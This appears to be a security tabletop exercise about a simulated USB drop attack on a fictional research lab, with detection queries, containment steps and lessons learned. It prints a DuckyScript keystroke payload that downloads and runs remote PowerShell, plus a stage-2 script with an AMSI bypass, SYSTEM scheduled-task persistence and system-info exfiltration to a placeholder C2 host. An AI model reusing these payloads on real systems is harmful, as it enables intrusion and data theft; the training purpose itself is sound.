Skip to content

SC-036: USB Drop Attack — Operation Iron Drop

Scenario Header

Type: Physical / Social Engineering  |  Difficulty: ★★★☆☆  |  Duration: 3–4 hours  |  Participants: 4–8

Threat Actor: IRON DROP — red team / physical penetration testing simulating insider and physical access threats

Primary ATT&CK Techniques: T1091 · T1204.002 · T1059.001 · T1547.001 · T1041 · T1560.001

Facilitator Note

This scenario simulates a USB drop attack against a research facility — weaponized USB drives planted in parking areas and common spaces to achieve initial access via human curiosity. Participants should include SOC analysts, endpoint security engineers, physical security officers, and HR/security awareness trainers. The scenario demonstrates the convergence of physical and cyber security and the effectiveness of social engineering via physical media. All data is synthetic. All organizations, IPs, and indicators are fictional.

Threat Actor Profile

IRON DROP represents a sophisticated red team engagement simulating a real-world adversary targeting intellectual property at a high-value research facility. The red team operates under rules of engagement that permit physical social engineering, USB-based payload delivery, and network-based post-exploitation. The simulated threat profile is a nation-state competitor seeking proprietary research data on quantum computing and advanced materials.

The red team's USB attack methodology uses commercially available Rubber Ducky devices (USB HID attack tools) disguised as standard USB flash drives, combined with custom PowerShell payloads. The devices are physically branded with the target organization's logo and labeled with enticing filenames to maximize insertion rates. Industry research indicates that 45–60% of USB drives found in parking lots are inserted into corporate systems, and this rate increases to 80%+ when the drives bear organizational branding.

Motivation: Espionage simulation — exfiltration of quantum computing research data, patent applications, and proprietary algorithms. The red team engagement was authorized by Quantum Research Labs' CISO to test physical security controls, endpoint protection, device control policies, and security awareness training effectiveness.

Scenario Narrative

Scenario Context

Quantum Research Labs is a private R&D facility with 480 employees, specializing in quantum computing hardware, quantum-resistant cryptography, and advanced materials research. The facility occupies a single campus with 3 buildings, a secured parking structure, and badge-controlled access at all entry points. The IT environment includes 620 endpoints (Windows 11 Enterprise), managed via Microsoft Intune, with CrowdStrike Falcon EDR deployed on all workstations. USB mass storage devices are restricted via Intune device configuration policy — however, USB HID (Human Interface Devices — keyboards, mice) are not blocked, as this would break legitimate peripherals. The security awareness program conducts annual phishing simulations but has never tested USB-based social engineering. Physical security includes 24/7 guard presence, CCTV in parking areas and lobbies, and badge access logging. The facility holds NIST 800-171 compliance for CUI protection.

Phase 1 — Physical Reconnaissance (~30 min)

IRON DROP conducts physical reconnaissance of Quantum Research Labs' campus over 5 days. The red team members pose as visitors, delivery personnel, and nearby business employees to observe physical security patterns, employee behavior, and campus layout.

Key observations:

  • Parking structure: 3 levels, badge-controlled vehicle entry, no guard at vehicle gate — pedestrian access unrestricted from adjacent public sidewalk
  • Employee behavior: Researchers frequently carry USB drives between labs — USB usage is culturally normalized
  • Smoking area: Outdoor area between Buildings A and B — no CCTV — employees leave badges visible on lanyards
  • Loading dock: Building C — delivery personnel not escorted — accessible from parking level 1
  • Badge design: Photographed from distance — blue badge with Quantum Research Labs logo, employee photo, first name

The red team also obtains Quantum Research Labs branded USB drives by ordering promotional items from the company's marketing vendor (publicly listed on the company's trade show registration page).

Evidence Artifacts:

Artifact Detail
Physical Recon Log 5 days of observation — Entry/exit patterns documented — Peak parking: 07:30–08:15, departure: 17:00–17:30 — CCTV coverage gaps identified: smoking area, parking level 3 row G-J
CCTV Footage (post-incident) Parking level 2 — 2026-03-12T05:42:00Z — Individual in dark jacket placing objects near vehicles — Duration: 4 minutes — Face not captured (hooded, head down)
Badge Photo (attacker) Quantum Research Labs badge design captured — Blue card, logo upper-left, photo center, first name lower — Sufficient for visual cloning
USB Drive Order Quantum Research Labs branded 32GB USB drives — Ordered from promo-vendor.example.com — Order #QRL-2026-0312 — 20 units — $180
Parking Access Log No badge required for pedestrian access to parking structure — Vehicle gate requires badge but pedestrian entrance unlocked 24/7
Phase 1 — Discussion Inject

Technical: The red team obtained branded USB drives through the company's promotional vendor — a common OSINT finding. What controls would prevent this? Consider: vendor access controls for branded merchandise, restricting promotional item orders to authorized personnel, and monitoring for unauthorized orders of company-branded materials.

Decision: The parking structure allows unrestricted pedestrian access despite badge-controlled vehicle entry. Implementing pedestrian badge access would cost approximately $45,000 (turnstiles, readers, installation) and create friction for employees walking from nearby transit stops. Do you (A) implement full pedestrian access control, (B) add CCTV coverage to parking pedestrian entrances as a compensating control, or (C) accept the risk given that the parking structure contains only vehicles, not sensitive areas? Consider the USB drop attack vector.

Expected Analyst Actions: - [ ] Review CCTV footage from parking areas for suspicious activity during early morning hours - [ ] Audit pedestrian access controls to parking structure — identify gaps - [ ] Review promotional vendor access — determine if branded USB drives can be ordered externally - [ ] Assess USB device control policies — verify HID vs mass storage restrictions

Phase 2 — USB Preparation and Deployment (~40 min)

IRON DROP prepares 15 weaponized USB devices using Hak5 Rubber Ducky hardware inserted into the branded Quantum Research Labs USB drive casings. Each device is programmed with a DuckyScript payload that:

  1. Identifies itself as a USB HID device (keyboard) — bypasses mass storage restrictions
  2. Opens a hidden PowerShell window (minimized, execution policy bypass)
  3. Downloads a stage-2 payload from 203.0.113.55 via HTTPS
  4. Establishes a reverse shell to the C2 server at 203.0.113.55:443
  5. Creates persistence via a scheduled task named WindowsHealthCheck
  6. Self-destructs the initial payload script

Each USB drive is labeled with enticing content to encourage insertion:

Label USB Count Target Placement
"Q4 Salary Adjustments — CONFIDENTIAL" 4 Parking level 2 (near executive spaces)
"Project NOVA — Patent Draft v3" 4 Parking level 1 (near Building A — research labs)
"Security Camera Footage — DO NOT DISTRIBUTE" 3 Smoking area, lobby bench
"Quantum Research Labs — Employee Benefits 2026" 4 Cafeteria, break room, loading dock

The USB drives are deployed at 05:42 UTC on March 12, 2026 — before employees arrive. The red team member accesses the parking structure via the unrestricted pedestrian entrance, places drives near vehicle doors and walkways, and exits within 4 minutes.

Evidence Artifacts:

Artifact Detail
DuckyScript Payload DELAY 2000GUI r (open Run) → DELAY 500STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://203.0.113.55/update.ps1')"ENTERDELAY 1000
Stage-2 Payload (update.ps1) PowerShell reverse shell → C2: 203.0.113.55:443 → Persistence: schtasks /create /tn "WindowsHealthCheck" /tr "powershell -w hidden -ep bypass -c IEX(...)" /sc daily /st 08:00 /ru SYSTEM → Cleanup: Remove-Item $env:TEMP\update.ps1
C2 Infrastructure Server: 203.0.113.55 — Domain: health-update.example.com — SSL cert: Let's Encrypt — Reverse proxy: Nginx — C2 framework: Sliver
USB Deployment Log (red team) 15 USB drives deployed — Parking L1: 4, Parking L2: 4, Smoking area: 2, Lobby: 1, Cafeteria: 3, Loading dock: 1 — Deployment time: 05:42–05:46 UTC
CCTV (Parking L2) Camera P2-C3 — 2026-03-12T05:42:14Z — Individual placing objects near vehicles in rows D-F — 4 minutes duration — Facial recognition: inconclusive (hood, low angle)
Phase 2 — Discussion Inject

Technical: The Rubber Ducky device identifies as a USB HID (keyboard), not mass storage — it bypasses Intune's USB mass storage restriction policy. What device control policies would block HID-based attacks? Consider: USB device whitelisting by vendor ID/product ID, blocking new HID device enrollment when screen is locked, requiring admin approval for new input devices, and endpoint detection of rapid keystroke injection (>1000 WPM).

Decision: Security awareness training has never covered USB-based attacks. The red team estimates 45–60% of found drives will be inserted. Do you (A) implement an emergency USB awareness campaign before the red team engagement results are revealed (tipping off the test), (B) let the test run to establish a baseline insertion rate for future comparison, or (C) implement technical controls (HID blocking) immediately while allowing the awareness test to continue? What is the ethics of testing employees' security awareness without prior notification?

Expected Analyst Actions: - [ ] Review CCTV footage for USB deployment activity (early morning parking area activity) - [ ] Check device control policies — verify whether USB HID devices are restricted - [ ] Prepare for potential USB-based compromise — ensure EDR monitoring is active - [ ] Coordinate with physical security on parking area patrol frequency

Phase 3 — Payload Execution and Initial Compromise (~40 min)

By 10:30 UTC on March 12, three employees have found and inserted USB drives into their workstations. The Rubber Ducky payload executes in approximately 3 seconds — faster than most users can react to the rapidly appearing and disappearing PowerShell window.

Compromised Hosts:

Host User Label Found Location Time Inserted EDR Alert
WKST-RES-112 mchen (Materials Researcher) "Project NOVA — Patent Draft v3" Parking L1 2026-03-12T08:14:22Z Triggered — PowerShell download cradle
WKST-ENG-084 asingh (Quantum Engineer) "Q4 Salary Adjustments — CONFIDENTIAL" Parking L2 2026-03-12T08:32:07Z Triggered — Suspicious scheduled task
WKST-ADM-023 bwilliams (Executive Assistant) "Employee Benefits 2026" Cafeteria 2026-03-12T09:47:33Z Not triggered — Payload variant with AMSI bypass

Evidence Artifacts:

Artifact Detail
Windows Event ID 6416 New device: USB HID — Vendor: 0x05AC — Product: 0x024F — Device: HID Keyboard Device — Host: WKST-RES-112 — User: mchen2026-03-12T08:14:20Z
Windows Event ID 6416 New device: USB HID — Host: WKST-ENG-084 — User: asingh2026-03-12T08:32:05Z
Windows Event ID 6416 New device: USB HID — Host: WKST-ADM-023 — User: bwilliams2026-03-12T09:47:31Z
CrowdStrike Alert (High) Host: WKST-RES-112 — Detection: PowerShell Download Cradle — Process: powershell.exe -w hidden -ep bypass — Parent: explorer.exe — URL: https://203.0.113.55/update.ps12026-03-12T08:14:25Z
CrowdStrike Alert (Medium) Host: WKST-ENG-084 — Detection: Suspicious Scheduled Task Creation — Task: WindowsHealthCheck2026-03-12T08:32:12Z
Windows Event ID 4688 Process: powershell.exe — CommandLine: -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://203.0.113.55/update.ps1')" — Host: WKST-RES-1122026-03-12T08:14:24Z
DNS Log WKST-RES-112health-update.example.com (resolves to 203.0.113.55) — 2026-03-12T08:14:24Z
Scheduled Task Created Host: WKST-ENG-084 — Task: \Microsoft\Windows\Maintenance\WindowsHealthCheck — Action: powershell.exe -w hidden -ep bypass -c IEX(...) — Trigger: Daily 08:00 — RunAs: SYSTEM2026-03-12T08:32:11Z
Stage-2 Payload (update.ps1) — Synthetic
# Quantum Research Labs Red Team — IRON DROP
# Stage 2: Reverse shell + persistence + recon
$c2 = "203.0.113.55"
$port = 443

# AMSI bypass (obfuscated)
$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$f = $a.GetField('amsiInitFailed','NonPublic,Static')
$f.SetValue($null,$true)

# Persistence via scheduled task
schtasks /create /tn "\Microsoft\Windows\Maintenance\WindowsHealthCheck" `
    /tr "powershell -w hidden -ep bypass -c `"IEX(New-Object Net.WebClient).DownloadString('https://$c2/update.ps1')`"" `
    /sc daily /st 08:00 /ru SYSTEM /f

# System enumeration
$info = @{
    hostname = $env:COMPUTERNAME
    user     = $env:USERNAME
    domain   = $env:USERDNSDOMAIN
    ip       = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
    admin    = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

# Exfil system info to C2
Invoke-RestMethod -Uri "https://$c2/api/checkin" -Method POST -Body ($info | ConvertTo-Json)

# Cleanup
Remove-Item $MyInvocation.MyCommand.Path -Force
Phase 3 — Discussion Inject

Technical: CrowdStrike detected the payload on 2 of 3 compromised hosts. The third host (WKST-ADM-023) was not detected because the payload variant included an AMSI bypass. How would you detect the AMSI bypass technique? Consider: monitoring for AmsiInitFailed field access, PowerShell script block logging (Event ID 4104), and behavioral detection of hidden PowerShell with network connections.

Decision: Three employees inserted found USB drives — a 20% insertion rate (3/15). Two were researchers and one was an executive assistant. Do you (A) immediately interview all three employees about their actions and awareness (potentially alerting others that a test is underway), (B) focus on technical containment first and conduct interviews later, or (C) use this as a teachable moment — brief the three employees, recruit them as "security champions," and use their experience in future awareness training?

Expected Analyst Actions: - [ ] Investigate CrowdStrike alerts for PowerShell download cradle and suspicious scheduled task - [ ] Correlate Event ID 6416 (USB device connection) across all endpoints — identify all insertions - [ ] Isolate compromised hosts: WKST-RES-112, WKST-ENG-084, WKST-ADM-023 - [ ] Block C2 domain and IP: health-update.example.com / 203.0.113.55 - [ ] Hunt for WindowsHealthCheck scheduled task across all endpoints - [ ] Collect remaining USB drives from campus before additional insertions

Phase 4 — Post-Exploitation and Data Exfiltration (~40 min)

From the undetected host WKST-ADM-023 (executive assistant bwilliams), IRON DROP escalates access. The executive assistant's account has calendar access for 3 C-suite executives and read access to the \\FILE-RD\QuantumProjects shared drive containing research documentation.

The red team conducts internal reconnaissance, identifies high-value research data, and exfiltrates a curated dataset of 847 MB — quantum computing research papers, patent application drafts, and algorithm source code — via HTTPS to the C2 server during business hours.

Evidence Artifacts:

Artifact Detail
SMB Access Log Source: WKST-ADM-023 (10.10.3.23) — Share: \\FILE-RD\QuantumProjects — Account: bwilliams — Files accessed: 2,341 — Total size: 847 MB — 2026-03-12T11:14:00Z–14:22:00Z
Network (Zeek) 10.10.3.23203.0.113.55:443 — HTTPS — 847 MB outbound over 3 hours — 1,247 sessions — Average payload: 679 KB — 2026-03-12T11:30:00Z–14:30:00Z
File Access Audit \\FILE-RD\QuantumProjects\NOVA\patent-draft-quantum-error-correction-v7.docx — Accessed by: bwilliams2026-03-12T11:14:22Z — Note: bwilliams has never accessed this file before
File Access Audit \\FILE-RD\QuantumProjects\ATLAS\algorithm-qec-stabilizer.py — Accessed by: bwilliams2026-03-12T11:42:08Z — First access
PowerShell Event 4104 Script block: Get-ChildItem -Path "\\FILE-RD\QuantumProjects" -Recurse -Include *.docx,*.pdf,*.py,*.ipynb | Select Name,Length,LastWriteTime | Export-Csv C:\Users\bwilliams\AppData\Local\Temp\inventory.csv — Host: WKST-ADM-0232026-03-12T11:08:33Z
DLP Alert Endpoint DLP: WKST-ADM-023 — 847 MB uploaded to external HTTPS destination — Classification: Not configured for research data — Alert: Volume-based only (>500 MB) — 2026-03-12T14:30:00Z
KQL — USB HID Device Connection Anomaly
DeviceEvents
| where ActionType == "PnpDeviceConnected"
| where DeviceDescription contains "HID" or DeviceDescription contains "Keyboard"
| where AdditionalFields contains "VID_05AC" or AdditionalFields contains "Rubber"
| extend VendorId = extract("VID_(\\w+)", 1, AdditionalFields)
| extend ProductId = extract("PID_(\\w+)", 1, AdditionalFields)
| join kind=leftanti (
    DeviceInventory
    | where DeviceType == "HID"
    | distinct VendorId, ProductId
) on VendorId, ProductId
| project Timestamp, DeviceName, AccountName, VendorId, ProductId
KQL — Rapid Keystroke Injection Detection
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("powershell.exe", "cmd.exe", "wscript.exe")
| where InitiatingProcessParentFileName == "explorer.exe"
| where Timestamp between (
    DeviceEvents
    | where ActionType == "PnpDeviceConnected"
    | where DeviceDescription contains "HID"
    | project ConnectionTime = Timestamp, DeviceName
) .. (
    DeviceEvents
    | where ActionType == "PnpDeviceConnected"
    | project ConnectionTime = Timestamp + 10s, DeviceName
)
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
SPL — USB HID Device Connection Anomaly
index=wineventlog EventCode=6416 DeviceDescription="*HID*" OR DeviceDescription="*Keyboard*"
| eval VendorId=mvindex(split(DeviceId,"\\"),1)
| search NOT [| inputlookup approved_hid_devices.csv | fields VendorId]
| table _time, host, user, DeviceDescription, VendorId, DeviceId
| sort - _time
SPL — PowerShell Download Cradle After USB Connection
index=wineventlog EventCode=4688 NewProcessName="*powershell.exe*"
    (CommandLine="*DownloadString*" OR CommandLine="*IEX*" OR CommandLine="*Net.WebClient*")
| join host [
    search index=wineventlog EventCode=6416 DeviceDescription="*HID*"
    | eval usb_time=_time
    | table host, usb_time
]
| where _time - usb_time < 30
| table _time, host, user, CommandLine, usb_time
SPL — Large Outbound HTTPS Transfer Detection
index=network sourcetype=firewall dest_port=443 action=allowed
| stats sum(bytes_out) as total_bytes dc(session_id) as sessions by src_ip, dest_ip
| where total_bytes > 500000000
| eval total_MB=round(total_bytes/1048576,2)
| table src_ip, dest_ip, total_MB, sessions
| sort - total_MB
Phase 4 — Discussion Inject

Technical: The executive assistant bwilliams has read access to \\FILE-RD\QuantumProjects — but has never accessed research files before. This access pattern anomaly is a strong UEBA signal. What baseline behavioral analytics would detect this? Consider: first-access file share monitoring, volume-based DLP, time-of-day access patterns, and file type access profiling.

Decision: The red team has exfiltrated 847 MB of research data including patent drafts and algorithm source code. Under the rules of engagement, the red team is authorized to exfiltrate data to demonstrate impact. However, the undetected compromise on WKST-ADM-023 has been active for 6 hours. At what point should the red team self-report to prevent actual harm, even if the rules of engagement allow continued operation? What ethical boundaries govern red team engagements?

Expected Analyst Actions: - [ ] Investigate DLP alert for 847 MB HTTPS upload from WKST-ADM-023 - [ ] Correlate file access anomaly — bwilliams accessing research files for the first time - [ ] Review PowerShell script block logs for file enumeration activity - [ ] Isolate WKST-ADM-023 and preserve forensic image - [ ] Audit bwilliams account permissions — assess least privilege compliance - [ ] Conduct physical sweep of campus for remaining USB drives

Detection & Response

Key Detection Opportunities

Detection Point Event / Data Source Query Logic
USB HID device connection Event ID 6416 / Defender ATP New HID device with unrecognized Vendor/Product ID
Rapid keystroke injection Process creation logs Shell process spawned within 5s of HID device connection
PowerShell download cradle EDR / Event ID 4104 IEX, DownloadString, Net.WebClient patterns
Suspicious scheduled task Event ID 4698 / EDR Task created with PowerShell execution, hidden window
File access anomaly File audit / UEBA First-time access to sensitive file shares
Volume-based exfiltration DLP / Network monitoring >500 MB HTTPS upload to uncategorized destination

Immediate Containment (0–4 hours)

  • [ ] Isolate all three compromised hosts from the network
  • [ ] Block C2 IP 203.0.113.55 and domain health-update.example.com at firewall and DNS
  • [ ] Remove scheduled task WindowsHealthCheck from all affected hosts
  • [ ] Conduct campus-wide physical sweep to collect remaining USB drives (12 unaccounted)
  • [ ] Hunt for Event ID 6416 (USB HID connection) across all 620 endpoints in past 48 hours
  • [ ] Reset credentials for mchen, asingh, and bwilliams

Short-Term Actions (24–72 hours)

  • [ ] Forensic imaging of all three compromised workstations
  • [ ] Enterprise-wide hunt for WindowsHealthCheck scheduled task and update.ps1 artifacts
  • [ ] Review all file access logs for bwilliams account on research shares
  • [ ] Deploy USB device whitelisting — block unknown HID vendor/product IDs via Intune
  • [ ] Enable PowerShell Constrained Language Mode on all workstations
  • [ ] Implement AMSI bypass detection rules in EDR
  • [ ] Brief physical security on USB drop threat — increase parking area patrols

Long-Term Actions (1–12 weeks)

  • [ ] Implement USB device whitelisting by Vendor ID/Product ID — only approved peripherals
  • [ ] Deploy USB port lockdown for lab workstations handling sensitive research data
  • [ ] Implement keystroke injection detection — alert on >500 WPM from newly connected HID devices
  • [ ] Conduct USB security awareness training — include USB drop simulation results
  • [ ] Restrict pedestrian access to parking structure — install badge-controlled turnstiles
  • [ ] Implement UEBA for file access anomaly detection (first-access, volume, time-of-day)
  • [ ] Deploy DLP with research data classification — block exfiltration of classified content
  • [ ] Review and restrict executive assistant access to research file shares (least privilege)
  • [ ] Implement "found USB" reporting procedure — provide secure drop boxes in lobbies

Lessons Learned

What Went Wrong

Gap Detail Remediation
USB HID devices not restricted Rubber Ducky identified as keyboard — bypassed mass storage block Implement USB device whitelisting by Vendor/Product ID; block unknown HID devices
No keystroke injection detection 3-second payload execution via rapid keystroke injection undetected Deploy behavioral detection for >500 WPM keystroke rate from new HID devices
AMSI bypass undetected on 1 host Payload variant bypassed AMSI on WKST-ADM-023 — no EDR alert Implement AMSI bypass detection; enable PowerShell Constrained Language Mode
Excessive file share permissions Executive assistant had read access to all research data — never needed Implement least privilege; quarterly access reviews; just-in-time access for sensitive shares
No USB security awareness training Employees inserted found USB drives — 20% insertion rate Conduct regular USB drop simulations; include in annual security awareness
Parking structure pedestrian access unrestricted Attacker entered parking area without badge — deployed USB drives undetected Install pedestrian access controls; increase CCTV coverage in parking areas
DLP not configured for research data Volume-based DLP alert at 500 MB — no content classification for research IP Deploy content-aware DLP with research data classification and blocking
No UEBA for file access First-time access to research shares by executive assistant went undetected for 3 hours Deploy UEBA with file access baselining and first-access alerting

What Went Right

Control Impact
CrowdStrike EDR detection (2/3 hosts) Detected PowerShell download cradle and suspicious scheduled task on 2 hosts
USB mass storage blocking Prevented traditional USB mass storage attacks — forced attacker to use HID method
Event ID 6416 logging USB device connections were logged — enabled forensic reconstruction
DLP volume-based alert Triggered at 500 MB — detected exfiltration (though 6 hours delayed)
CCTV in parking area Captured USB deployment activity (though facial recognition was inconclusive)

ATT&CK Navigator Mapping

Technique ID Technique Name Phase
T1091 Replication Through Removable Media Initial Access
T1204.002 User Execution: Malicious File Execution
T1059.001 Command and Scripting Interpreter: PowerShell Execution
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Persistence
T1053.005 Scheduled Task/Job: Scheduled Task Persistence
T1562.001 Impair Defenses: Disable or Modify Tools (AMSI bypass) Defense Evasion
T1083 File and Directory Discovery Discovery
T1560.001 Archive Collected Data: Archive via Utility Collection
T1041 Exfiltration Over C2 Channel Exfiltration

Discussion Questions

Discussion Questions

  1. Physical-Cyber Convergence: USB drop attacks exploit the gap between physical security and cybersecurity teams. How should organizations structure their security programs to ensure physical and cyber teams share threat intelligence and coordinate detection? What reporting lines and communication channels are most effective?

  2. USB Device Control Trade-offs: Blocking all USB HID devices would prevent Rubber Ducky attacks but would also break legitimate keyboards, mice, and accessibility devices. How do you balance security against operational usability? Evaluate the feasibility of USB device whitelisting by Vendor/Product ID in an organization with 620 endpoints and diverse peripheral hardware.

  3. Security Awareness Effectiveness: Industry research shows that 45-60% of found USB drives are inserted into corporate systems. Annual phishing simulations have become standard practice, but USB drop simulations are rare. Why is there a gap, and how would you design a USB drop awareness program that is both effective and ethical? What are the legal and HR considerations?

  4. Red Team Ethics: The red team's rules of engagement permitted data exfiltration to demonstrate impact. The undetected compromise on WKST-ADM-023 persisted for 6 hours and resulted in 847 MB of research IP being exfiltrated to a red team-controlled server. At what point should ethical boundaries override rules of engagement? How do you write ROE that balance realism with risk?

  5. Least Privilege and Access Reviews: The executive assistant bwilliams had read access to all research file shares despite never needing that access. This is a common pattern in organizations where permissions accumulate over time. Design a quarterly access review process that would have caught this over-provisioning. What automated tools and UEBA baselines would support this?

  6. Detection Engineering Priority: Given the detection gaps identified in this scenario (HID device anomaly, keystroke injection, AMSI bypass, file access anomaly, content-aware DLP), how would you prioritize building these detections? Consider detection coverage vs. false positive rate, engineering effort, and which detection would have stopped the attack earliest in the kill chain.

  7. Insider Threat Parallels: While this scenario involves an external red team, the attack path after initial access mirrors an insider threat — a trusted user account accessing sensitive data and exfiltrating it over an encrypted channel. How would your detection and response differ if this were a genuine insider rather than a USB-based external compromise?

Scenario Debrief

Operation Iron Drop demonstrates that the convergence of physical and cyber attack vectors remains one of the most effective — and most underestimated — paths to compromise. A $12 Rubber Ducky device, disguised as a branded USB drive and placed in a parking lot, bypassed millions of dollars in network security controls by exploiting the most reliable vulnerability in any organization: human curiosity. The 20% insertion rate (3 of 15 drives) is consistent with industry research, and the USB HID attack bypassed Intune's mass storage restrictions because keyboard devices cannot be universally blocked without breaking legitimate peripherals. The undetected compromise on WKST-ADM-023 — enabled by an AMSI bypass variant — persisted for 6 hours and resulted in 847 MB of research IP exfiltration. Defense requires layered controls: USB device whitelisting by Vendor/Product ID, keystroke injection detection, AMSI bypass monitoring, UEBA for file access anomalies, content-aware DLP, physical access controls for parking areas, and — most critically — security awareness training that includes USB drop simulations. The human element is both the greatest vulnerability and the strongest potential defense.